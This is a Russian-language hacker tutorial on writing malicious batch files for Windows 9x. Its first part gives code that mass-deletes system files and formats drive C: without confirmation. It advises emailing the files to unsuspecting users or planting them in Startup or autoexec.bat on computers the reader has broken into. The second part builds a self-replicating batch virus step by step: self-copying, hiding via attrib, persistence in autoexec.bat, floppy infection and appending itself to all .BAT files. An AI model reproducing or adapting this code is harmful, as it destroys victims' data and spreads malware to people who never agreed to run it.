Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так) Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!! del *.exe -удаяем все файлы с расширением .exe del *.ini -удаяем все файлы с расширением .ini del *.com -удаяем все файлы с расширением .com cd\ cd windows cd system del *.dll del *.exe После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!) Код полностью:
Cd\ Cd C: Сd windows del *.exe del *.ini del *.com cd\ cd windows cd system del *.dll del *.exe
Но вдруг папка виндовс называется не windows а например winMe, или win98, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.
Код полностью:
Cd\ Cd C: Сd winMe Del *.exe Del *.ini Del *.com Cd\ Cd win98 Cd system Del *.dll Del *.exe
и так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит Windows 9Х!!! Люблю прикалывать ламеров, это форматирование диска С:\ Форматируем диск С:\ Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл Format C:\ -команда форматирования диска С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером Y -тоже самое Y -уже говорил Хе! Вот и все… Код полностью:
Cd\ Format C:\ Y Y Y
Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь. В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути C:\WINDOWS\COMMAND\format c: но само сабой форматироваться не будет, а потребует потверждение и простая команда Y Y Y не поможет, нужена другая. Просто добавим параметр /autotest
C:\WINDOWS\COMMAND\format c: /autotest
В данном случае, подтверждать ничего не придется.
Как и где это применить? Просто отсылаете бат фаил какому нибудь юзверю по аське или на мыло. При открытие файла, начнёца процесс. Так что не советую открывать фаил у себя на компе.
Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить. Но как сделать так, чтобы файл запустился автоматически? Лазив по компу жертвы Вам вдруг захотелось форматнуть его винт, ну мало ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите запустить файл со своего компа на компе жертвы. Но всёже есть пару вариантов. Первый, это загрузить файл в автозагрузку по пути
C:\windows (или как там будет папка называться)\Главное меню \ Программы \Автозагрузка или переименовать Ваш батик в Autoexec.bat и загрузить в корневой С:\
ЧАСТЬ 2
@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat
Этот вирус заражает винчестер, оставляя только один файл virus.bat. Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел более четкие очертания дополним его возможностью заражать другие ПК:
@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul
В этом примере появляется строка, которая дает возможность вирусу заражать дискеты. Смысл этого в том что если при перезагрузке ПК в дисководе будет дискета, то она будет заражена. Конечно файл virus.bat в корневом диске C: будет сильно мозолить глаза юзеру, чтобы этого не было существует программа attrib. Преобразуем вирус:
@Echo off copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul
Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в autoexec.bat будет записываться каждый раз при перезагрузке ПК. Чтобы этого не произошло есть простой способ: после записи вызова надо с помощью программы attrib установить атрибут только чтение у autoexec.bat. А есть другой вариант, он немного посложнее, но
гораздо грамотнее:
@Echo off if exist c:virus.bat goto cool copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :cool copy %0 a:run.bat >nul
Здесь вторая строка проверяет существует ли уже файл c:virus.bat и если он уже существует, то происходит переход к метке cool. Этот способ тоже очень прост. Явный недостаток - если юзер уберет вызов из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет нагло обманут. Чтобы вирус был умнее, то надо использовать программу find, если вам будет не лень с ней разбираться, то вы сможете написать более сложный BAT-вирус, который будет заражать не один
файл c:autoexec.bat, а все *.BAT.
Пример: @echo off%[MeTrA]% if '%1=='In_ goto MeTrAin if exist c:MeTrA.bat goto MeTrAru if not exist %0 goto MeTrAen find "MeTrA"<%0>c:MeTrA.bat attrib +h c:MeTrA.bat :MeTrAru for %%t in (*.bat) do call c:MeTrA In_ %%t goto MeTrAen :MeTrAin find "MeTrA"<%2>nul if not errorlevel 1 goto MeTrAen type c:MeTrA.bat>>%2
:MeTrAen
Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном примере она MeTrA. Например, в первой строке эта метка ничего не делает, во второй строке эта метка, как бы, не является пассивной, она используется для внутренней работы вируса, а именно участвует в названии метки. При запуске вирус проверяет, есть ли файл C:METRA.BAT, если нет, то вирус создает его и с помощью программы find копирует из файла (из которого стартовал) все строки содержащие метку вируса, т.е. копирует только вирусные строки. Так, вирусные строки скопированы. Значит в файле C:METRA.BAT теперь находится копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило повторного заражения используется все таже программа find. Допустим вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь первый параметр In_ говорит вирусу, что надо заразить файл, имя которого указано во-втором параметре, в данном случае он RUN.BAT. Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл RUN.BAT оказывается зараженным.
|